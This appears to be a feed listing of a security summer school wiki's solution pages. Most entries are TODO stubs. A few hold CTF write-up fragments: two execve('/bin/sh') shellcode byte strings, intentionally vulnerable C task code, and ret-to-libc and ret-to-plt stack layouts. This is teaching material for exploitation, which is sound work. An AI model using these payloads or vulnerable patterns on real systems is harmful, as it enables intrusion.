https://security.cs.pub.ro/summer-school/wiki/ 2026-04-26T14:34:45+00:00 https://security.cs.pub.ro/summer-school/wiki/ https://security.cs.pub.ro/summer-school/wiki/_media/wiki/dokuwiki.svg text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/01?rev=1595152140&do=diff 0x01. Exploration Tools (Solutions) Solutions archive text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/02?rev=1595152140&do=diff 0x02. Assembly Language (Solutions) Solutions archive Simple Syscall TODO Looping Math TODO Call Secret Function TODO No Exit TODO Extra: Obfuscation TODO Extra: Platform-independent TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/03?rev=1595152140&do=diff Session 03 Solutions Binary Puzzle TODO Case of Missing Function TODO Memory Dump Analysis TODO Extra: Fix Me TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/04?rev=1595152140&do=diff Session 04 Solutions hyp3rs3rv3r TODO crypto_crackme TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/05?rev=1595152140&do=diff Session 05 Solutions Simple Password-protected Bash TODO Buffer Overflow Bash TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/07?rev=1595152140&do=diff Session 07 Solutions Manual Fuzzing TODO Automated Fuzzing TODO File Format Fuzzing TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/08?rev=1595152140&do=diff 0x08. Shellcodes (solutions) Solutions archive Create and disassemble binary shellcodes We extract the two shellcode byte strings from the given links (1, 2): $ cat 216.print \x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff $ cat 827.print \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/09?rev=1595152140&do=diff 0x09. Defense Mechanisms (Solutions) TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/10?rev=1595152140&do=diff Session 10 Solutions ret-to-plt Idea: The stack would need to look like: * address of puts (in place of the return address) * address of exit * argument to puts call (address of string) ret-to-libc Idea: The stack would need to look like: text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/11?rev=1595152140&do=diff 0x0A. Return Oriented Programming (Solutions) Solutions archive Gadget Tut Check the payload.py script in the gadget-tutorial/ subfolder in the solutions archive. Echo Service script[a log file for the server side][one for the client side]cat By going through the echo_service.c file we see that in the echo_service() function we use read() for reading text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/12?rev=1595152140&do=diff 0x0B. Return Oriented Programming (part 2) (Solutions) Solutions archive text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/13?rev=1595152140&do=diff Session 13 Solutions Valgrind Warm-Up TODO Hunting Memory Errors in nginx TODO Shellcode, Sanitizing and Alphanumeric Shellcode TODO Static Analysis with Cppcheck TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/14?rev=1595152140&do=diff Session 14 Solutions Binary Scavanger Hunt TODO Hack-me-1 TODO Hack-me-2 TODO text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/ctf-final-beta?rev=1595152140&do=diff Final CTF: Beta task writeup #include <stdio.h> #include <fcntl.h> void cadet_login() { char buf[100]; dprintf(2, "Hello cadet! Tell us your name\n"); fgets(buf, 100, stdin); } void task() { unsigned long pass; unsigned long user; setbuf(stdout, NULL); int fd = open("/dev/urandom", O_RDONLY); if (fd==-1) exit(-1); if (read(fd, &pass, 4) != 4) exit(-1); close(fd); scanf("%lu", user); if (user == pass) { printf("Congratulations. You deserve a shell\n"); system("/bin/sh… text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/ctf-final-parrot?rev=1595152140&do=diff Final CTF: Parrot task writeup void parrot(int sockfd) { int count; char buf[1024]; dprintf(sockfd, "==============================================\n"); dprintf(sockfd, "Welcome to the Unexploitable Parrot service\n"); dprintf(sockfd, "==============================================\n"); dprintf(sockfd, "Stack smashing is futile if you apply protection mechanisms, right? Can you prove me wrong?\n"); dprintf(sockfd, "Here, have a stack buf… text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/mid-ctf_asks1_3?rev=1595152140&do=diff CTF Tasks 1 & 3 We are presented with two binaries that do almost the same thing. Let's see what exactly: Task 1 # ./caseservice pass 4242 Server-side debug: login password is set to [example] .... in another terminal: # nc 127.0.0.1 4242 ============================================== Welcome to the Case Switching service ============================================== Make your choice (1 or 2): 1. Use service 2. Configure service (only for administrators) 1 You selected [1] Input: input si… text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/mid-ctf_tasks2_4?rev=1595152140&do=diff CTF Tasks 2 & 4 Task 2 We start by browsing the source code and looking for a vulnerability. We immediately see this line: calendar[allowed_day] = entry; Here, both allowed_day and entry are controlled by us and there is no bounds checking. Thus, this is an arbitrary write to anywhere in memory. However, it's a relative rather than absolute write, which limits us to known offsets. The usual suspect for arbitrary writes is the return address. If we had a function that called text/html 2020-07-19T09:49:00+00:00 Anonymous (anonymous@undisclosed.example.com) https://security.cs.pub.ro/summer-school/wiki/session/solution/start?rev=1595152140&do=diff Solutions solution index